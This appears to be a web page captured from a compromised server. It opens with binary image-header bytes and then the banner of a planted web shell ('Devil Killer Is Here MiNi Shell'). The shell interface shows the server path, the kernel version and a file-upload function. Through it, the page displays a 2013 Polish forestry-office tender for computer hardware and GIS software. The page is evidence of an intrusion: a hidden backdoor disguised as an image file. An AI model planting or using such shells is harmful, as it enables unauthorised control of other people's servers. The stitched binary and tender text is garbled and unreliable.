JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130528/207262-N-2013.html

<p class="kh_header"><b>Drawno: Dostawa sprzętu komputerowego i oprogramowania do Nadleśnictwa DRAWNO</b><br>
<b>Numer ogłoszenia: 207262 - 2013; data zamieszczenia: 28.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Nadleśnictwo Drawno , ul. Kaliska 5, 73-220 Drawno, tel. 095 7682041; 0606328270.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szczecin.lasy.gov.pl/drawno</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego i oprogramowania do Nadleśnictwa DRAWNO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia podzielony jest na dwie części, zwane dalej pakietami, z których każdy stanowi przedmiot odrębnego postępowania. Podział na pakiety oraz składowe pakietów przedstawiają się następująco:
Pakiet numer 1 - dostawa i montaż w siedzibie Zamawiającego następującego wyposażenia (przedmiot zamówienia we Wspólnym Słowniku Zamówień (CPV) oznaczony jest kodem: 30211000-1, 30216110-0, 30232100-5, 30231300-0, 30236000-2): 
1.Komputer - (stacja graficzna) - 1 sztuka
Lp.Nazwa komponentu	
Wymagane minimalne parametry techniczne komputerów
1.Typ	Komputer stacjonarny. W ofercie wymagane jest podanie modelu, symbolu oraz producenta
2.Zastosowania	Komputer będzie wykorzystywany dla potrzeb aplikacji biurowych, aplikacji obliczeniowych, dostępu do internetu oraz poczty elektronicznej, jako lokalna baza danych, stacja programistyczna, stacja graficzna (grafika 3D)
3.Płyta główna Płyta główna z możliwością zainstalowania dwóch procesorów.
4. Wydajność obliczeniowa	Procesor powinien osiągać w teście wydajności PassMark PerformanceTest (wynik dostępny: http://www.cpubenchmark.net/cpu_list.php) co najmniej wynik 12900 punktów Passmark CPU Mark 
5. Pamięć operacyjna	Min. 32GB (4x8GB) DDR3 1600MHz ECC RIMM możliwość rozbudowy do 512GB  
6. Parametry pamięci masowej Min. 1 x 256GB SSD SATA (dysk systemowy)
Min. 3 x 500GB  SATA 7200 RPM 
7. Wydajność grafiki	Karta graficzna powinna umożliwiać pracę min. dwu-monitorową, wspierać technologię min. DirectX w wersji 10.1 i OpenGL w wersji 3.0 
Grafika powinna osiągać w teście wydajności PassMark PerformanceTest co najmniej wyniki 1110 punktów w G3D Rating 
wynik dostępny: http://www.videocardbenchmark.net/gpu_list.php
8. Wyposażenie multimedialne Karta dźwiękowa zintegrowana z płytą główną, zgodna z High Definition, 24-bitowa konwersja sygnału cyfrowego na analogowy i analogowego na cyfrowy np. Realtek ALC269 version C (ALC269-VC) lub równoważna
9. Obudowa Obudowa typu MidiTower, umożliwiająca pracę w pionie jak i w poziomie
Obudowa musi umożliwiać serwisowanie komputera bez użycia narzędzi,
Wnęki na napędy: min. 1 x 5.25 min. 1 x 3,5
10. Zgodność z systemami operacyjnymi i standardami	Zgodność z 64-bitową wersją systemu operacyjnego Microsoft Windows 7 Ultimate  PL, zainstalowany system operacyjny + nośnik
11. Ergonomia Głośność jednostki centralnej mierzona zgodnie w trybie pracy dysku twardego (WORK) wynosząca maksymalnie 25dB (załączyć oświadczenie producenta) 
12. Warunki gwarancji	3-letnia gwarancja producenta świadczona na miejscu u klienta, czas reakcji serwisu do 3 dni roboczych.
W przypadku awarii dysków twardych dysk pozostaje u Zamawiającego - wymagane jest dołączenie do oferty oświadczenia producenta sprzętu o spełnieniu tego warunku.
13. Wsparcie techniczne producenta	Dostęp do najnowszych sterowników i uaktualnień na stronie producenta zestawu realizowany poprzez podanie na dedykowanej stronie internetowej producenta numeru seryjnego lub modelu komputera - do oferty należy dołączyć link strony.
14. Wymagania dodatkowe	-	Płyta główna zaprojektowana i wyprodukowana na zlecenie producenta komputera, dedykowana dla danego urządzenia; wyposażona w : 
- min. 2 złącze PCI Express x16 (Gen. 3)
- min. 1 złącze PCI Express x8 w tym jedno elektrycznie jak PCIe x4 (Gen 3)
- min. 6 złącza SATA w tym min. 2 sztuki SATA 3.0
- min. 12 złączy DDR3/RDIMM z obsługą do 512GB pamięci RAM
- zintegrowany czteroportowy kontroler SATA z obsługą funkcji RAID 0/1/5/10
- Wbudowane porty: 
 1 x RS232 (dopuszcza się kartę na złączu PCIe, jeśli zachowana zostanie wymagana ilość wolnych slotów); 
 min. 8 portów USB wyprowadzonych na zewnątrz komputera w tym min 2 porty USB 3.0; w tym min. 1 port USB 3.0 i 1 port USB 2.0 wyprowadzone na panelu przednim
 port słuchawek i mikrofonu 
- Bezprzewodowy zestaw klawiatury z myszką; w tym: 
 klawiatura USB, pełnowymiarowa (z klawiaturą numeryczną)
 mysz USB z min. trzema klawiszami oraz rolką (scroll), z czujnikiem laserowym o rozdzielczości min. 1000 ppi, z możliwością pracy na każdym podłożu (w tym - na szkle)
- Karta sieciowa 10/100/1000 Ethernet RJ45
- Możliwość podłączenia dwóch niezależnie pracujących kart graficznych
- Karta IEEE 1394 PCIe wyposażona w min. dwa porty zewnętrzne (6-pin) i min. 1 wewnętrzny (10-pin) 
- Nagrywarka DVD +/-RW wraz z oprogramowaniem do nagrywania i odtwarzania płyt (zamawiający dopuszcza urządzenie typu slim )
- Dołączony nośnik z sterownikami
- Opakowanie musi być wykonane z materiałów podlegających powtórnemu przetworzeniu
- Zainstalowany program antywirusowy z licencją 15 miesięcy
2. Monitor LCD 23 cale - 2 sztuki
Lp. Nazwa komponentu	Wymagane minimalne parametry techniczne monitora
1. Typ ekranu	Ekran ciekłokrystaliczny z aktywną matrycą TFT min. 23 cale
2. Powłoka matrycy	Antyodblaskowa
3. Podświetlenie	System podświetleń z diodami LED
4. Głębia kolorów	Min. 16,7 miliona kolorów
5. Rozmiar plamki	Max. 0,27 mm
6. Jasność	Min. 250 cd/m2
7. Kontrast	Min. 1000:1 typowy (2 000 000:1 dynamiczny)
8. Kąty widzenia (pion/poziom)	Min. 160/170 stopni
9. Czas reakcji matrycy	Max. 5 ms
10. Rozdzielczość	1920 x 1080 przy 60Hz
11. Wydłużenie w pionie	130 mm
12. Obrót monitora w pionie (PIVOT)	TAK
13. Obrót monitora w poziomie	+/-45 stopni
14. Pochylenie monitora	W zakresie od -4 do +30 stopni
15. Złącze 	15-stykowe złącze D-Sub, złącze DVI-D,  USB
16. Gwarancja	3 lata na miejscu u klienta
Czas reakcji serwisu - do 3 dni roboczych
Gwarancja 1 uszkodzonego piksela
3. Serwer NAS+ 2 x dysk twardy 3,5 cala, 2TB, SATA/600,7200RPM 
Nazwa komponentu	Wymagane minimalne parametry techniczne
Ilość dysków	Min. 2x3,5cala,2TB, SATA/600, 7200RPM
Złącza dodatkowe	2xUSB 3,0, 5xUSB2,0, 2x eSATA
Gwarancja	Minimum 3 lata serwis w miejscu instalacji.
4. UPS
Lp.	Nazwa komponentu	Wymagane minimalne parametry techniczne UPSa
1. Moc pozorna	Min. 1600 VA
2. Moc rzeczywista	Min. 1000 Wat
3. Architektura UPSa	off-line (standby)
4. Maks. czas przełączenia na baterię	Max. 5 ms
5. Liczba i rodzaj gniazdek z utrzymaniem zasilania	Min. 4 x SCHUKO
6. Liczba, typ gniazd wyj. z ochroną antyprzepięciową	Min. 4 x SCHUKO
7. Typ gniazda wejściowego	IEC320 C14 (10A)
8. Czas podtrzymania dla obciążenia 100%	Min. 5 minut
9. Czas podtrzymania przy obciążeniu 50%	Min. 11 minut
10. Zakres napięcia wejściowego w trybie podstawowym	184-264 V
11. Zimny start	Tak
12. Porty komunikacji	USB
13. Port zabezpieczający linie danych	RJ11 - linia modemowa/faxowa
14. Diody sygnalizacyjne	LCD display
15. Typ obudowy	-  Tower
16. Wyposażenie standardowe	- Kabel zasilający
- Kabel USB
17. Dołączone oprogramowanie	Tak do zarządzania zasilaczem awaryjnym
18. Gwarancja	Min. 3 lata zgodnie z warunkami producenta
5. Skaner sieciowy A3 - 1 sztuka
Typ skanera	Sieciowy stołowy (płaski) skaner z podajnikiem arkuszowym.
Źródło światła	Technologia LED  
Optyczna rozdzielczość skanowania	Min. 600 dpi 

Panel LCD TAK
Funkcje obrazowania dokumentów	Usuwanie kolorów RGB, automatyczne rozpoznawanie formatu w przypadku różnych dokumentów, automatyczna segmentacja obszaru, pomijanie pustych stron.
Szybkość skanowania: 
A4 200/300 dpi cz./b., skala szarości i kolor	Min. 40 stron na minutę / min. 80 obrazów na minutę w duplex
Automatyczny podajnik dokumentów 
Typ	Przesuwany, 1 kierunkowe skanowanie dwustronne, detekcja pobrania dwóch arkuszy.
Format dokumentu	A3 / B4 / A4 / B5 / A5 / B6 / A6 / Legal / Letter / Ledger / Executive 
Pojemność papieru	Min. 200 arkuszy (80 g/m2)
Złącze	Min. USB 2.0 , 
Min. Wbudowana w urządzenie karta sieciowa: min. 10BASE-T/100Base-TX - RJ-45  
Systemy operacyjne:	Windows XP, Windows XP x64, Windows Vista, Windows Vista x64, Windows 7, Windows 7 x64 
Gwarancja	Minimum 3 lata serwis w miejscu instalacji.
6.	Drukarka atramentowa wielkoformatowa A0 - 1 sztuka
Typ drukarki	44 cale drukarka wielkoformatowa - atramentowa - kolor
Paleta kolorów atramentu	6 kolorów atramentu - cyjan, magenta, żółty, czarny photo, czarny mat, szary

Rozmiar maksymalny nośnika  	Rolka (111,8 cm x 91 m)
Minimalny format nośnika  	210 mm x 279 mm (format Letter A)
Maksymalny rozmiar nośnika 
 	1118 mm x 1676 mm
Rozmiary nośników	A4 (210 x 297 mm), A3 (297 x 420 mm), A2 (420 x 594 mm), A1 (594 x 841 mm), A0 (841 x 1189 mm), 210 x 279 mm, 1118 x 1676 mm
Zakres grubości nośnika	Do 0,8 mm
Gramatura nośnika	60 g/m2 - 328 g/m2
Podajnik(i) nośników	min. 1 x ładowanie ręczne - 1 rolki - rolka (111,8 cm x 91 m) 
Gramatura: 60 g/m2 - 328 g/m2
Prędkość drukowania	min. Do 1.33 str./min. - black draft - A1 (594 x 841 mm)  
min. Do 1.33 str./min. - color draft - A1 (594 x 841 mm)
Maksymalna rozdzielczość (wydruki 
czarno-białe)	min. 2400 dpi x 1200 dpi
Rozdzielczość maks (kolor)	min. 2400 dpi x 1200 dpi
Interfejs	min. 1 x sieć - Ethernet 10Base-T/100Base-TX - RJ-45  
min. 1 x Hi-Speed USB
 
Zainstalowana pamięć RAM (maks.)	min. 8 GB
Dysk twardy	min. 160 GB
Typy nośników	Papier zwykły, papier powlekany, papier fotograficzny półbłyszczący, papier fotograficzny o wysokim połysku, papier fotograficzny błyszczący, papier fotograficzny matowy, papier bezdrzewny bond, satynowy papier fotograficzny, papier do podświetlanych ekspozycji
Praca w sieci	Tak
Zasilanie	AC 120/230 V
Wymagania systemowe	Microsoft Windows XP SP2 lub wyższy, Microsoft Windows Vista (32/64 bits), Microsoft Windows 7 (32/64 bits)
Dołączone oprogramowanie	Tak
Emisja dźwięku (w czasie pracy)	Max. 35 dBA
Gwarancja i serwis	Minimum 3 lata z naprawą u Klienta w ciągu 3 dni roboczych
Wyposażenie	3 x głowica drukująca 
1 x pojemnik z atramentem ( cyjan ) 
1 x pojemnik z atramentem ( magenta ) 
1 x pojemnik z atramentem ( żółty ) 
1 x pojemnik z atramentem ( photo black ) 
1 x pojemnik z atramentem ( szary ) 
1 x pojemnik z atramentem ( czarny mat )
Dodatkowe wyposażenie	Dodatkowy komplet (3 głowice + 6 kolorów atramentów)
Dodatkowe 5 rolek papieru
Pakiet numer 2 - dostawa oprogramowania (przedmiot zamówienia we Wspólnym Słowniku Zamówień (CPV) oznaczony jest kodem: 48000000-8):
Lp.	Rodzaj oprogramowania
1	Pojedyncza licencja komercyjna rozszerzenia 3D Analyst do ArcGIS 10.0 lub oprogramowanie równoważne
2	Pojedyncza licencja komercyjna rozszerzenia Spatial Analyst do ArcGIS 10.0 lub oprogramowanie równoważne.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.10.00-1, 48.00.00.00-8, 30.21.61.10-0, 30.23.13.00-0, 30.23.21.00-5, 30.23.60.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości: 2 000,00 zł (słownie: dwa tysiące złotych). Wadium może być wnoszone wedle wyboru Wykonawcy w jednej lub kilku następujących formach:
1) pieniądzu,
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3) gwarancjach bankowych,
4) gwarancjach ubezpieczeniowych,
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jedn. Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm.).

Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: 29203000451110000001274260. Wadium w formie gotówki nie będzie przyjmowane. Wadia wnoszone w innych formach niż pieniądz należy deponować w kasie w siedzibie zamawiającego.

Wadium należy wnieść w terminie do dnia 05.06.2013 roku do godz.10:30. W przypadku wniesienia wadium w pieniądzu, za moment wniesienia wadium uznaje się moment uznania rachunku Zamawiającego. 

W przypadku wniesienia wadium w innej formie niż pieniądz, termin ważności wystawionego dokumentu powinien być zgodny z terminem związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie złożonego oświadczenia (załącznik nr 2 do SIWZ) na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, dokonali co najmniej jednej dostawy polegającej na dostawie sprzętu komputerowego:
- o łącznej wartości netto nie mniejszej niż 50.000,00 zł, 
oraz załączą dokument potwierdzający, że dostawa ta została wykonana należycie. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie złożonego dokumentu (załącznik nr 4 do SIWZ) na zasadzie spełnia/nie spełnia.
W przypadku złożenia przez Wykonawców dokumentów zawierających wartości usług w innej walucie niż PLN Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs NBP z dnia zamieszczenia ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Tabela kursów znajduje się na stronie www.nbp.pl.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie złożonego oświadczenia (załącznik nr 2 do SIWZ) na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie złożonego oświadczenia(załącznik nr 2 do SIWZ) na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na podstawie złożonego oświadczenia (załącznik nr 2 do SIWZ) na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Formularz oferty (wg wzoru - załącznik nr 1, 1a,1b do specyfikacji istotnych warunków zamówienia).

Dokumentacja potwierdzającą wymagane parametry urządzeń w języku polskim (dokumentacja techniczna, foldery itp.)</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy. Każda zmiana 
i uzupełnienie umowy, będzie wymagać aneksu w formie pisemnej pod rygorem nieważności. Poza innymi przypadkami określonymi w treści umowy, zmiany umowy będą mogły być wprowadzane w związku z zaistnieniem okoliczności, których wystąpienia Zamawiający i Wykonawca nie przewidywali w chwili zawierania umowy. Wskazane okoliczności nie mogą być wywołane zarówno przez Zamawiającego, jak 
i Wykonawcę, ani przez nich zawinione i muszą wywoływać ten skutek, iż umowa nie będzie mogła być wykonana wedle pierwotnej treści, w szczególności z uwagi na rażącą stratę grożącą jednemu z nich lub niemożność osiągnięcia celu umowy. Okoliczności te odnosić się mogą w szczególności do wystąpienia nagłych zmian stanu prawnego, gwałtownej dekoniunktury, kryzysów finansowych w skali ponadpaństwowej, konieczności uwzględnienia wpływu ewentualnych prac zamiennych na realizację przedmiotu umowy. 
Niezależnie od powyższego, Zamawiający dopuszcza możliwość zmian redakcyjnych Umowy oraz zmian będących następstwem zmian danych zarówno jego, jak i Wykonawcy ujawnionych w rejestrach publicznych, a także zmian korzystnych z punktu widzenia realizacji przedmiotu umowy, w szczególności przyspieszających realizację, obniżających koszt ponoszony przez Zamawiającego na wykonanie, utrzymanie lub użytkowanie przedmiotu umowy bądź zwiększających użyteczność przedmiotu umowy. W takiej sytuacji, wprowadzone zostaną do umowy stosowne zmiany weryfikujące redakcyjne dotychczasowe brzmienie umowy bądź wskazujące nowe dane wynikające ze zmian w rejestrach publicznych albo też kierując się poszanowaniem wzajemnych interesów, zasadą równości oraz ekwiwalentności świadczeń i przede wszystkim zgodnym zamiarem wykonania przedmiotu umowy, określą zmiany korzystne z punktu widzenia realizacji przedmiotu umowy. Wszelkie zmiany wprowadzane do umowy dokonywane będą z poszanowaniem obowiązków wynikających z obowiązującego prawa, w tym w szczególności art. 140 ust. 3 PZP oraz zasad ogólnych rządzących tą ustawą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szczecin.lasy.gov.pl/drawno<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Drawno
ul. Kaliska 5
73-220 Drawno
pok. 1.</p>
